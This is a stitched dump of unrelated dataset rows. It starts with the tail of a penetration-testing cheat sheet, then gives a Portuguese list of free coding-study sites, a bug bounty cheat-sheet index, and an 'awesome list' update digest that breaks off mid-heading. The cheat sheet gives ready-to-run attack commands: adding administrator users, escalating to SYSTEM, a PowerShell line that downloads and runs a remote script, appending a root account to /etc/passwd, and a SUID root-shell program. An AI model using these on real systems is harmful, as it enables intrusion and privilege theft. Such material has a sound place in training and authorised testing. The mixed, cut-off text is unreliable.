LHOST=192.168.0.10 LPORT=4444 -f js_le\n```\n\n## WordPress\n\nScan for known vulnerabilities\n```\nwpscan --url http://192.168.0.20/wp/\n```\n\nCrack retrieved password hashes\n```\nhashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n```\n\n## Windows Enumeration\n\nBasic information about Windows\n```\nsysteminfo\n```\n\nList network adapters and IP addresses\n```\nipconfig /all\n```\n\nList open ports and active service connections\n```\nnetstat -ano\n```\n\nUser information, groups, privileges\n```\nwhoami\nwhoami /groups\nwhoami /priv\nnet user\nnet user /domain\nnet user peter\nnet localgroup\n```\n\nShow ACL information for a folder\n```\nicacls \"C:\\Program Files\"\n```\n\nList services, their paths, start mode and privileges\n```\nwmic service get name,displayname,pathname,startmode,startname\nwmic service get name,displayname,pathname,startmode,startname | findstr /i \"auto\" | findstr /i /v \"C:\\Windows\"\n```\n\nList installed software, vendors and version numbers\n```\nwmic product get name,version,vendor\n```\n\nList drivers installed on the system\n```\ndriverquery /v\n```\n\n## Windows Privilege Escallation\n\nAdd a new user\n```\nnet user peter password /add\n```\n\nAdd user to a group\n```\nnet localgroup Administrators /add peter\nnet localgroup \"Remote Desktop Users\" /add peter\n```\n\nFrom Administrator shell to nt authority\\system\n```\nPsExec.exe -i -s cmd.exe\n```\nDownload PowerShell script and execute it without having to store the script on the host\n```\npowershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.0.1/Invoke-Kerberoast.ps1'); Invoke-Kerberoast\"\n```\n\n## Linux Enumeration\n\nUpgrading a dumb reverse shell to an interactive TTY\n```\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n```\n\n## Linux Privilege Escallation\n\nIf /etc/passwd is writable, add a new user with root privileges\n```\nopenssl passwd -1 password\n$1$7RaNk8Qt$vIvEmA/ylE5Rg7t1sDvrG0\n\nopenssl passwd -6 -salt peter password\n$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.\n\necho 'peter:$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.:0:0:peter:/root:/bin/bash' >> /etc/passwd\n```\n\nSample C program to add a new user. Useful if it is possible to run a program from the root context.\n```\n#include \n\nFILE *pfile;\n\nint main(void) {\n pfile = fopen(\"/etc/passwd\", \"a\");\n fprintf(pfile, \"%s\", \"peter:$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.:0:0:peter:/root:/bin/bash\\n\");\n return 0;\n}\n```\n\nSample SUID program to execute a root shell\n```\n#include \n#include \n#include \n\nint main(void) {\n setuid(0);\n setgid(0);\n system(\"/bin/bash\");\n}\n```\n\nSet the SUID bit and ownership for an executable\n```\nchown root:root /tmp/program\nchmod u+s /tmp/program\n```\n\n## Port Forwarding / Tunneling\n\nRemote port forwarding in Linux with SSH\n```\nssh -oStrictHostKeyChecking=no -f -N -p 22 -R 9090:127.0.0.1:8080 kali@192.168.0.10 -i id_rsa\n```\n\nRemote port forwarding in Windows with plink.exe\n```\nplink.exe -v -ssh -P 22 -R 9090:127.0.0.1:8080 kali@192.168.0.10 -pw kali\n\n```\nDynamic port forwarding in Linux with SSH\n```\nssh -D 1080 kali@192.168.0.10\n```\n\n## Tools\n\nA simple wget alternative in python to download files when wget is not available\n```\nimport urllib2\nimport sys\n\nresponse = urllib2.urlopen(sys.argv[1])\ndata = response.read()\nfilename = sys.argv[1].split(\"/\")[-1]\ntarget_file = open(filename, \"w\")\ntarget_file.write(data)\ntarget_file.close()\n```\n"}}},{"rowIdx":536,"cells":{"text":{"kind":"string","value":"# Sumário\n\n- [Sobre esse repositório](#sobre-esse-repositório)\n- [Sites com exercícios](#sites-com-exercícios)\n- [IDE's online](#ides-online)\n- [Outras Ferramentas](#outras-ferramentas)\n- [Extras](#extras)\n- [API](#api)\n\n# Sobre esse repositório\n- Esse repositório foi criado por mim [Fernanda Souza](https://github.com/leitoraincomum) com o intuito de divulgar ferramentas gratuitas que possam auxiliar pessoas em seus estudos.\n- Se conhece alguma que não está listada, faça fork desse repositório e abra uma solicitação de alteração (pull request).\n\n# Sites com exercícios\n- *Sites com exercícios para treinar*\n\n|Nome com Link | Sistema de Pontuação? | Salva Projetos? | Linguagens Suportadas | Observações |\n| ---------------- | ---------------- |---------- |----------- | -------- |\n|[beecrowd](https://www.beecrowd.com.br/) | SIM | Não | C, C++, C#, Clojure, Dart, Go, Haskell, Java, JavaScript, Kotlin, PHP, Python, R, Ruby, Rust e Scala | 6 Modos desde o iniciante, com Hello World! |\n|[Bento.IO](https://bento.io)| Sim | Não | Nenhuma específica | Plataforma de auxilio a se tornar autodidata em programação (em inglês)|\n|[C4n y0u H4ck 1t](https://hack.ainfosec.com/) | Sim | Não | |Site com desafios de segurança, simples e avançados (Os pontos podem ser usados para se candidatar a empresa) |\n|[Can You Hack Us?](https://canyouhack.us/) | Sim | Não | |Site com desafios de segurança (desde a pagina inicial)|\n|[Code](https://code.org)| Não | Sim | Não disponível | Cursos de treino de lógica, entre outros para pessoas iniciantes |\n|[Code Academy](https://www.codecademy.com/)| Não | Não Sei| Diversas áreas de conhecimento| -------------|\n|[Code Chef](https://www.codechef.com/ide)| Sim | Sim | As principais de competições de programação| Site para treinamento em competições de programação |\n|[Code Wars](https://www.codewars.com/)| Sim | Sim | CoffeScript, Coq, Go, NASM, Scala, Shell, entre outras.| Plataforma com exercícios para estudo de diversas linguagens (em inglês) |\n|[Codepip](https://codepip.com/) | Sim | Não | HTML, CSS e JavaScript| Série de jogos e exercícios práticos para praticar a stack básica de frontend |\n|[Coder Byte](https://www.coderbyte.com/)| ------ | ------ | C, C++, C#, Clojure, Dart, Elixir, Go, Java, JavaScript, Kotlin, PHP, Python3, R, Ruby, Scala, Swift, TypeScript | O Coderbyte oferece mais de 200 desafios de programação e os desafios vão de fáceis a difíceis. ||[Coding Game](https://www.codingame.com/start) | Não sei | Sim | Bash, C, C++, C#, Clojure, D, Dart, F#, Go, Groovy, Haskell, Java, JavaScript, Kotlin, Lua, Objective-C, OCaml, Pascal, PHP, Python, Ruby, Rust, Scala, Swift, TypeScript e VB.NET | --------- |\n|[Coding Game](https://www.codingame.com/)| Sim | Sim | Bash, C, C#, C++, Clojure, D, Dart, F#, Go, Groovy, Haskell, Java, Javascript, Kotlin, Lua, ObjectiveC, OCaml, Pascal, Perl, PHP, Python3, Ruby, Rust, Scala, Swift, TypeScript, VB.NET| Site para competir e aprender criando algoritmos para jogar|\n|[Coursera](https://www.coursera.org/)| Não | Não | Diversas | Plataforma de cursos gratuitos com certificado |\n|[CSS Battle](https://cssbattle.dev/) | Sim | Sim | HTML, CSS | Site de competição de css com menor numero de caracteres |\n|[CSS Diner](https://flukeout.github.io/)| Não | Não | CSS | Desafios para treinar seletores CSS |\n|[Exercism](https://exercism.org/)| Sim | Sim | Diversas (55 linguagens) | Plataforma 100% free, para aprender e praticar |\n|[Flex Box](https://flexboxfroggy.com)| Não | Não | Flex Box (CSS) | Desafios para treinar FLex Box |\n|[Flexbox Zombies](https://mastery.games/flexboxzombies/)| Sim | Sim | CSS | Jogo gratuito para exercitar CSS de forma mais dinâmica e divertida |\n|[Free Code Camp](https://www.freecodecamp.org)| Não | Não | Diversas | Plataforma de certificação de habilidades técnicas gratuita (em inglês) |\n|[Fullstack Café](https://www.fullstack.cafe/)| Não | Não | Diversas | Plataforma para treinar perguntas técnicas e desafios de código (em inglês) |\n|[Grid Garden](https://cssgridgarden.com/) | Não | Não | CSS | Site para aprender e treinar css grid layout |\n|[Hack the box](https://www.hackthebox.com/)| Sim | Sim | |Site com desafios de segurança|\n|[Hackr.IO](https://hackr.io) | Não | Não | Diversas | Agregador de cursos online, gratuitos e pagos |\n|[Hacker Rank](https://www.hackerrank.com)| SIM | Não | Angular, C#, CSS, Go, Java, JavaScript, Node, Node.js, Python, R, React, Rest API, SQL e etc. | Modos básicos e intermediários |\n|[Kaggle](https://www.kaggle.com/) | SIM | Não | Python, R, SQL | Maior site de referência para aprendizado de Data Science, Machine Learn e afins |\n|[Kattis](https://open.kattis.com/)| Sim | Sim | C, C#, C++, COBOL, F#, Go, Haskell, Java, Node.js, SpiderMonkey(JS), Kotlin, Common Lisp, Objective-C, OCaml, Pascal, PHP, Prolog, Python 2, Python 3, Ruby, Rust | Site com desafios de algoritimo para treinar, com rank de países e universidades |\n|[Khan Academy](https://pt.khanacademy.org) | Sim | Não | Lógica e outras disciplinas | --------- |\n|[Koans Kotling](https://play.kotlinlang.org/koans/Introduction/Hello,%20world!/Task.kt)| Não | Não | Kotlin | Teste de estruturas Kotlin para aprendizado |\n|[Kotlinautas - Exercícios Kotlin](https://github.com/Kotlinautas/curso-kotlinautas)| Não | Não | Kotlin | Projeto com exercícios de Kotlin em pt-br que pode ser utilizado dentro da IDE Intellij Community com o plugin EduTools |\n|[LeetCode](https://leetcode.com/) | SIM | Não | C, C++, C#, Go, Java, JavaScript, Kotlin, PHP, Python, Python3, R, Ruby, Rust, MySQL, MS SQL, Oracle, Bash, Swift, Rust, Typescript, Racket, Erlang e Elixir | Site muito bom para treinar programação e estudar pra entrevista de código, tem módulos básicos, intermediários e avançados. Sessão com materiais de estudos com prática e contest toda semana. |\n|[PicoCTF](https://picoctf.org/)| Sim | Não | ------ | Site com desafios de segurança(em inglês)|\n|[SoloLearn](https://www.sololearn.com/)| Sim | Não | Diversas | Diversos cursos gratuitos de programação com certificado. (em inglês)|\n|[SQL Murder mistery](https://mystery.knightlab.com/walkthrough.html) | Não | Não | SQL | Site com explicação/tutoriais interativos de sql que com os resultados ajudam a resolver um mistério |\n|[Top Coder](https://www.topcoder.com)| Sim | ------ | Diversas, depende do desafio | Voltado para programação competitiva, onde se pode competir com os outros resolvendo desafios o mais rápido possível para ter as melhores pontuações.|\n|[Try Hack me](https://tryhackme.com/) | Sim | Sim | |Site com desafios e tutorias de segurança |\n\n# IDE's online\n- *Caso queira estudar linguagens e não possa ou não queira instalar uma IDE, existem essas online*\n\n|Nome com Link | Sistema de Pontuação? | Salva Projetos? | Linguagens Suportadas | Observações |\n| ---------------- | ----------- | ---------------- | ----------- | -------- |\n|[Code Sand Box](https://codesandbox.io)| Não | Sim | HTML, CSS, Node.js, [entre outras](https://codesandbox.io/docs/start) | Plataforma para projetos front-end |\n|[DartPad](https://dartpad.dev/) | Não | Não | Dart | --------- |\n|[Glitch](https://glitch.com/) | Não | Sim | Linguagens para aplicações web | IDE e comunidade para aplicações web |\n|[IDEONE](https://ideone.com)| Não | Sim | Ada95, Assembler, AWK, Bash, C99, Cobol, COBOL 85, Fortran, Go, SQLite, Swift, [entre outras](https://ideone.com/credits)| ------ |\n|[Learn Git](https://learngitbranching.js.org/?locale=pt_BR)| Não | Não | Git | Aqui você pode aprender no passo a passo ou treinar no modo sandbox! |\n|[OnLineGDB](https://www.onlinegdb.com) | Não | Sim | C, C++, Python, PHP, Ruby, C#, VB, Perl, Swift, Prolog, Javascript, Pascal, HTML, CSS e JavaScript | -------- |\n|[Online IDE](https://www.online-ide.com)| Não | Não | Bash, C, C++, Go Lang, Java, PHP, Python, R e Ruby | Não tem sistema de login para usar |\n|[ReplIt](https://repl.it/)| Não | Sim | Bloop, Deno, Julia, Lua, Nim, Raku, Roy, [entre outras](https://replit.com/site/about) | -------- |\n|[vscode(beta)](https://vscode.dev/)| Não | Localmente | C/C++, C#, Java, PHP, Rust, Go, TypeScript, JavaScript, Python, JSON, HTML, CSS, and LESS, [entre outras](https://code.visualstudio.com/blogs/2021/10/20/vscode-dev)|\n|[CodePen](https://codepen.io/)| Sim | Sim | HTML, CSS, JavaScript | Editor de códigos front end. Suporta importação de scripts, fontes e CSS externos. Feedback imediato das atualizações feitas. Ótimo para treinar CSS :)\n|[Fronteditor](https://www.fronteditor.dev/)| Não | Sim | HTML, CSS, JavaScript, Markdown | Um simples editor de texto para projetos HTML/CSS/JavaScript.)\n|[Programiz](https://www.programiz.com/python-programming/online-compiler/)| Não | Não | Python, C, C++, C#, Java, JS, SQL, HTML/CSS | Não tem sistema de login para usar |\n\n# Outras Ferramentas\n- *Outras ferramentas de aprendizado gratuitas*\n\n|Nome com Link | Sistema de Pontuação? | Linguagens Suportadas | Descrição |\n| ---------------- | --------------------------- | ----------- | -------- |\n|[APP Inventor](http://ai2.appinventor.mit.edu/) | Não | Indefinida | Site para construção de aplicações mobile para iniciantes usando métodos de blocos para programação |\n|[Cron App](https://www.cronapp.io/) | Não | Diversas | Plataforma de desenvolvimento de projetos de aplicações web em nuvem |\n|[Read Me](https://readme.so/editor)| Não | Read Me | Site para criação de ReadMe para seus projetos |\n|[Free for Dev](https://free-for.dev/)| Não | Diversas | Site com serviços, ferramentas e recursos gratuitos para devs (hospedagem, cloud, monitoramento, testes, etc)\n|[Carbon](https://carbon.vercel.app/)| Não | Diversas | Site para criar e compartilhar bonitas imagens do seu codigo\n|[Thunkable](https://thunkable.com/#//)| Não | No-code | Plataforma para aprendizado e prototipação de aplicativos mobile.\n\n\n# Extras\n- *Cursos, vídeo aulas, etc. gratuitos*\n\n|Nome com Link | Tipo de Conteúdo | Feito por: |\n| ------ | -------- | -------- |\n| [4Noobs](https://github.com/he4rt/4noobs) | Tutorais e guias de diversos tópicos com nível iniciante em TI | Comunidade He4rt |\n|[Blog Kotlin](https://blog.kotlin-academy.com/best-kotlin-free-online-courses-5838cb7063c6) | Página do blog oficial da linguagem Kotlin com cursos gratuitos com a missão de simplificar o aprendizado do Kotlin | Mantenedores da Linguagem |\n|[Curso em Video](https://www.cursoemvideo.com/course/)| Portal de ensino com diversos cursos como Linux, Redes, Python, Java, PHP, Javascript, HTML, CSS, entre muitos outros| Gustavo Guanabara |\n|[Descomplicando o Docker](https://www.youtube.com/watch?v=0cDj7citEjE&list=PLf-O3X2-mxDk1MnJsejJwqcrDC5kDtXEb)| Série de vídeo aulas | Jeferson Fernando ([LinuxTips](https://www.linuxtips.io)) |\n|[Descomplicando Kubernets](https://www.youtube.com/playlist?list=PLf-O3X2-mxDmXQU-mJVgeaSL7Rtejvv0S)| Série de vídeo aulas | Jeferson Fernando ([LinuxTips](https://www.linuxtips.io)) |\n|[DEV CHALLENGE](https://www.devchallenge.com.br/challenges)| Desafios de front-end, back-end e mobile | [Lorena Montes](https://www.linkedin.com/in/lorenagmontes/) |\n|[Diego Mariano](https://diegomariano.com/home/#free-courses)| Portal de cursos que contém cursos gratuitos com certificado em tópicos como HTML, CSS, Linux, SQL, PHP, entre outros| Diego Mariano|\n|[Introdução Js](http://betrybe.com/curso-gratuito-js)| Curso introdutório de JavaScript | Trybe |\n|[loiane.training](https://loiane.training/cursos)| Cursos de Java, Angular, Phoneag e Apache Cordova, Fundamentos EXT JS 4 | [Loiane Groner](https://www.youtube.com/channel/UCqQn92noBhY9VKQy4xCHPsg)|\n|[PHP do Jeito Certo](http://br.phptherightway.com)| Tutorial de PHP em texto | Josh Lockhart e [colaboradores](http://br.phptherightway.com/#site-footer)|\n|[Poke PHP](https://pokephp.com.br)| Série de vídeo aulas | Rodrigo \"PokemaoBR\" Cardoso |\n|[Kitten](https://kitten.code.game)| Plataforma lúdica de criação de games com foco em pessoas entre 3 e 18 anos | Codemao (Shenzhen Dianmao Technology Co., Ltd) |\n|[Solyd](https://solyd.com.br/treinamentos/)| Introdução ao Hacking e Pentest e Python básico | Solyd|\n|[WoMakersCode](https://maismulheres.tech/courses)| Cloud Computing, DevOps, Data Science, Inteligência artifical e muito mais| Microsoft|\n|[Learn Ayything](https://learn-anything.xyz)| Trilhas com cursos, vídeos, artigos e repositórios do GitHub sobre qualquer assunto | Nikita Voloboev e Angelo Gazzola |\n|[Microsoft Learn](https://docs.microsoft.com/pt-br/learn/)| Trilhas com tutoriais escritas sobre diversas tecnologias e ferramentas | Microsoft |\n|[App Ideas](https://github.com/florinpop17/app-ideas)| Repositório com desafios de programação desde o iniciante até projetos avançados | Florin Pop |\n|[Vue3 do Iniciante ao Avançado](https://igorhalfeld.teachable.com/p/treinamento-completo-e-gratuito-de-vue-js-3-do-iniciante-ao-avancado) | Curso completo de Vue3 | Igor Halfeld\n|[AWS Training](https://www.aws.training/) | Treinamentos AWS com ferramentas e suporte para as certificações | AWS |\n|[Assert+](https://www.assertplus.com.br/) | Conteúdo em geral sobre qualidade e testes de software | [Jhonatas Matos](https://github.com/jhonatasmatos) |\n|[Série para iniciantes em JavaScript](https://www.youtube.com/playlist?list=PLb2HQ45KP0WsFop0pItGSUYl6baYjKEye) | Curso de Introdução ao JavaScript| [Glaucia Lemos](https://twitter.com/glaucia_lemos86) | JavaScript |\n|[Build JavaScript applications using TypeScript](https://learn.microsoft.com/en-us/training/paths/build-javascript-applications-typescript/?WT.mc_id=javascript-23355-gllemos) | Curso de capacitação em TypeScript criado pela Microsoft e em PT-BR| Microsoft e [Glaucia Lemos](https://twitter.com/glaucia_lemos86) |\n|[Curso Introdutório a Svelte](https://vercel.com/docs/beginner-sveltekit) | Curso de introdução ao framework frontend Svelte gratuito| [Vercel](https://vercel.com/) |\n|[Cod3r Cursos](https://www.youtube.com/c/COD3RCURSOS) | Cursos de desenvolvimento web | [Cod3r](https://www.cod3r.com.br/) |\n|[Curso de Flutter 2022](https://www.youtube.com/watch?v=Wdn6peqH9ZQ&list=PLlBnICoI-g-fuy5jZiCufhFip1BlBswI7)| Série de vídeo aulas | Flutterando |\n|[Professor Isidro](https://www.professorisidro.com.br/courses/)| Cursos introdutórios de JAVA, Estrutura de Dados, Desenvolvimento Web e Compiladores | [Professor Isidro](https://www.instagram.com/professorisidro/) |\n\n# API\n- *Sites com concentração de API's para projetos*\n\n|Nome com link | Descrição | Mantido por: |\n| ------ | ----- | ------ |\n|[RapiDapi](https://rapidapi.com/pt/marketplace)| Coleção de API's | RapidAPI |\n|[BrasilAPI](https://brasilapi.com.br/docs) | Projeto de código aberto, que transforma o Brasil em uma API | Comunidade |\n|[Public APIs](https://github.com/public-apis/public-apis)| Repositório com várias APIs gratuitas dos mais diversos assuntos|Public APIs|\n|[Any API](https://any-api.com/)| Site com diversas apis abertas de diversos nichos | LucyBot Inc.|\n|[ServeRest](https://serverest.dev/)| O ServeRest é uma API REST gratuita que simula uma loja virtual com intuito de servir de material de estudos de testes de API | [Paulo Gonçalves](https://github.com/PauloGoncalvesBH) |\n|[Studio Ghibli API](https://ghibliapi.herokuapp.com/#section/Studio-Ghibli-API)| Site com filmes, personagens e outros personagens dos filmes do Studio Ghibli | Comunidade |\n\n\n"}}},{"rowIdx":537,"cells":{"text":{"kind":"string","value":"# Bug Bounty Cheat Sheet\n\n- [XSS](cheatsheets/xss.md)\n- [SQLI](cheatsheets/sqli.md)\n- [SSRF](cheatsheets/ssrf.md)\n- [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md)\n- [CSV Injection](cheatsheets/csv-injection.md)\n- [LFI](cheatsheets/lfi.md)\n- [RCE](cheatsheets/rce.md)\n- [Open Redirect](cheatsheets/open-redirect.md)\n- [Crypto](cheatsheets/crypto.md)\n- [Template Injection](cheatsheets/template-injection.md)\n- [Content Injection](cheatsheets/content-injection.md)\n\n# Contributing\n\nWe welcome contributions from the public.\n\n### Using the issue tracker 💡\n\nThe issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues)\n\n### Issues and labels 🏷\n\nOur bug tracker utilizes several labels to help organize and identify issues.\n\n### Guidelines for bug reports 🐛\n\nUse the GitHub issue search — check if the issue has already been reported.\n\n# Style Guide\n\nWe like to keep our Markdown files as uniform as possible. So if you submit a PR make sure to follow this style guide (We will not be angry if you do not.)\n\n- Cheat sheet titles should start with `##`.\n- Subheadings should be made bold. (`**Subheading**`)\n- Add newlines after subheadings and code blocks.\n- Code blocks should use three backticks. (```)\n- Make sure to use syntax highlighting whenever possible.\n\n# Contributors\n\n- [EdOverflow](https://github.com/EdOverflow)\n- [GerbenJavado](https://github.com/GerbenJavado)\n- [jon_bottarini](https://github.com/BlueTower)\n- [sp1d3r](https://github.com/sp1d3r)\n"}}},{"rowIdx":538,"cells":{"text":{"kind":"string","value":"# Awesome List Updates on May 11, 2018\n\n9 awesome lists updated today.\n\n[🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung)\n\n\n\n## [1. Awesome Machine Learning](/content/josephmisiti/awesome-machine-learning/README.md)\n\n### JavaScript / General-Purpose Machine Learning\n\n* [TensorFlow.js](https://js.tensorflow.org/) - A WebGL accelerated, browser based JavaScript library for training and deploying ML models.\n\n## [2. Awesome Ember](/content/ember-community-russia/awesome-ember/README.md)\n\n### Packages / Helpers\n\n* [ember-root-url (⭐11)](https://github.com/ef4/ember-root-url) - A template helper to keep your URLs relative to the app's rootURL.\n\n## [3. Awesome Css Learning](/content/micromata/awesome-css-learning/README.md)\n\n### Animation / Grid\n\n* [CSS 3D transforms](https://3dtransforms.desandro.com) - Multi page tutorial with examples like card flip and carousel effects.\n* [CSS Animation for Beginners](https://robots.thoughtbot.com/css-animation-for-beginners) - Imparts the concepts of CSS animations with keyframes.\n* [animatable](http://leaverou.github.io/animatable/) - Nice little page demonstrating which CSS properties are animatable.\n\n## [4. Awesome](/content/Awesome-Windows/Awesome/README.md)\n\n### Games\n\n* [LuaStudio](http://scormpool.com/luastudio) - Free game development tool/engine. Create games and other graphic focused apps on Windows using Lua/LuaJIT programming language. Export them to many platforms including iOS, Android and Mac.\n\n## [5. Awesome Elixir](/content/h4cc/awesome-elixir/README.md)\n\n### Cloud Infrastructure and Management\n\n* [Kazan (⭐136)](https://github.com/obmarg/kazan) - Kubernetes client for Elixir, generated from the k8s open API specifications.\n\n### Date and Time\n\n* [cocktail (⭐178)](https://github.com/peek-travel/cocktail) - Elixir date recurrence library based on iCalendar events.\n\n### Examples and funny stuff\n\n* [feedx (⭐11)](https://github.com/erneestoc/feedx) - Add social feed functionality to current applications. Exemplify OTP umbrella app, with 3 apps. Thin phoenix controllers.\n\n### Framework Components\n\n* [plug\\_canonical\\_host (⭐32)](https://github.com/remiprev/plug_canonical_host) - Plug to ensure all requests are served from a single canonical host.\n\n### HTML\n\n* [tidy\\_ex (⭐9)](https://github.com/f34nk/tidy_ex) - Elixir binding to the granddaddy of HTML tools .\n\n### Queue\n\n* [gen\\_rmq (⭐178)](https://github.com/meltwater/gen_rmq) - Set of behaviours meant to be used to create RabbitMQ consumers and publishers.\n\n### Security\n\n* [pwned (⭐21)](https://github.com/thiamsantos/pwned) - Check if your password has been pwned.\n\n### Testing\n\n* [mockingbird (⭐3)](https://github.com/Driftrock/mockingbird) - A set of helpers to test code that involves http requests.\n\n### Third Party APIs\n\n* [shopify (⭐94)](https://github.com/nsweeting/shopify) - Easily access the Shopify API.\n\n### Translations and Internationalizations\n\n* [getatrex (⭐6)](https://github.com/alexfilatov/getatrex) - Automatic translation tool of Gettext locales with Google Translate for Elixir/Phoenix projects.\n\n## [6. Awesome C](/content/inputsh/awesome-c/README.md)\n\n### Compilers\n\n* [CompCert](http://compcert.inria.fr/) - Fully-verified C compiler. Supports almost all of C89. [`GNU GPL2.1 or later`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)\n* [Intel SPMD](http://ispc.github.io/) - Compiler for a variant of the C language, for single program, multiple data programming. [`Various licenses`](https://github.com/ispc/ispc/blob/master/LICENSE.txt)\n\n### Compression\n\n* [lz4](https://lz4.github.io/lz4/) - Fast Compression algorithm.\n* [quicklz](http://www.quicklz.com/index.php) - Fast compression library. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)\n\n### Crypto\n\n* [libgcrypt](https://gnupg.org/related_software/libgcrypt/) - General-purpose cryptography library, with a range of available ciphers. [`GNU LGPL2.1or later (code)`](http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html) and [`GNU GPL2.1 or later (manual and tools)`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)\n* [libsodium](https://download.libsodium.org/doc/) - Modern and easy-to-use crypto library. [`Expat`](https://directory.fsf.org/wiki/License:Expat)\n* [libtomcrypt](https://www.libtom.net/) - Fairly comprehensive, modular and portable cryptographic toolkit. [`Public Domain`](https://creativecommons.org/share-your-work/public-domain/)\n\n### Database\n\n* [sophia](http://sophia.systems/) - Modern, embeddable key-value database. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)\n\n### Editors\n\n* [Qt Creator](https://www.qt.io/qt-features-libraries-apis-tools-and-ide/#ide) - Cross-platform IDE written with C++ and Qt, part of the Qt SDK. Supports Clang Code Model. [`GNU GPL3 with Qt exception`](https://github.com/qt-creator/qt-creator/blob/master/LICENSE.GPL3-EXCEPT)\n\n### RTOS\n\n* [Amazon FreeRTOS](https://aws.amazon.com/freertos/) - RTOS for microcontrollers that makes small, low-power edge devices easy to program. [`MIT`](https://github.com/aws/amazon-freertos/blob/master/LICENSE)\n* [Contiki](http://www.contiki-os.org/) - Connect low-cost, low power microcontrollers to the Internet. [`3-clause BSD`](https://github.com/contiki-os/contiki/blob/master/LICENSE)\n\n### Frameworks\n\n* [C Algorithms](https://fragglet.github.io/c-algorithms/) - Collection of common algorithms and data structures for C. [`ISC`](https://directory.fsf.org/wiki/License:ISC)\n* [EFL](https://www.enlightenment.org/) - Large collection of useful data structures and functions.\n* [qlibc](http://wolkykim.github.io/qlibc/) - Simple and powerful C library, designed as a replacement for GLib while focusing on being small and light. [`qLib license`](https://github.com/wolkykim/qlibc/blob/master/LICENSE) (similar to [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD))\n\n### Engines\n\n* [ioquake3](https://ioquake3.org/) - The Quake3 engine, freed at last. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)\n* [Orx](http://orx-project.org/) - Portable, lightweight, plugin-based, data-driven, 2D-oriented game engine. [`zlib`](https://directory.fsf.org/wiki/License:Zlib)\n\n### Resources\n\n* [Chipmunk2D](http://chipmunk-physics.net/) - Fast and lightweight 2D game physics library. [`Expat`](https://directory.fsf.org/wiki/License:Expat)\n* [FreeGLUT](http://freeglut.sourceforge.net/) - Alternative to the OpenGL Utility Toolkit. Allows the creation and management of windows with OpenGL contexts. [`X11`](https://directory.fsf.org/wiki/License:X11)\n* [libao](https://xiph.org/ao/) - Cross-platform audio library with a wide variety of outputs. [`GNU GPL2.1 or later`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)\n* [SDL and SDL2](https://www.libsdl.org/) - Cross-platform development library designed to provide low-level access to audio, keyboard, mouse, joystick and graphics hardware via OpenGL. SDL2 is the most current version. [`zlib`](https://directory.fsf.org/wiki/License:Zlib)\n\n### Generic Programming\n\n* [klib](http://attractivechaos.github.io/klib/#About) - Small and lightweight implementations of common algorithms and data structures. [`MIT`](https://en.wikipedia.org/wiki/MIT_License)\n\n### JSON\n\n* [WJElement (⭐101)](https://github.com/netmail-open/wjelement/wiki) - Advanced JSON manipulation library, with support for JSON Schema. [`LGPL, any version`](https://github.com/netmail-open/wjelement/)\n\n### Memory Allocators / Language Standards\n\n* [jemalloc](http://jemalloc.net/) - General purpose malloc(3) implementation that emphasizes fragmentation avoidance and scalable concurrency support, commonly used in production systems. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)\n\n### Multimedia / Language Standards\n\n* [libmpv](https://mpv.io/) - Music-playing library. Compile with `./waf configure --disable-cplayer --enable-libmpv-shared` to not have the music player. [`GNU GPL2.1 or later`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)\n* [libsoundio](http://libsound.io/) - Library for cross-platform, real-time audio input and output. Has a range of back-ends. [`Expat`](https://directory.fsf.org/wiki/License:Expat)\n\n### Networking and Internet / Language Standards\n\n* [czmq](http://czmq.zeromq.org/) - High-level binding for ZeroMQ. [`MPL2.0`](https://www.gnu.org/licenses/license-list.html#MPL-2.0)\n* [libuv](http://libuv.org/) - Cross-platform asynchronous I/O. [`Expat`](https://directory.fsf.org/wiki/License:Expat)\n* [lwan](https://lwan.ws/) - Experimental, scalable, high-performance HTTP server. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)\n* [mongoose](https://cesanta.com/) - Embedded web server for C. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)\n\n### Web Frameworks / Language Standards\n\n* [balde](https://balde.rgm.io/) - Microframework for C based on GLib. [`GNU LGPLv2.1`](http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html)\n* [kore](https://kore.io/) - Easy to use, scalable and secure web application framework for writing web APIs in C.\n* [klone](http://www.koanlogic.com/klone/) - KLone is a fully-featured, multiplatform, web application development framework.\n\n### Numerical / Language Standards\n\n* [apophenia](http://apophenia.info/) - Library for statistical and scientific computing. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)\n\n### Parallel Programming / Language Standards\n\n* [ck](http://concurrencykit.org/) - Concurrency primitives, safe memory reclamation mechanisms and non-blocking data structures. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)\n* [libdill](http://libdill.org/) - Structured concurrency in C. [`X11`](https://directory.fsf.org/wiki/License:X11)\n\n### String Manipulation / 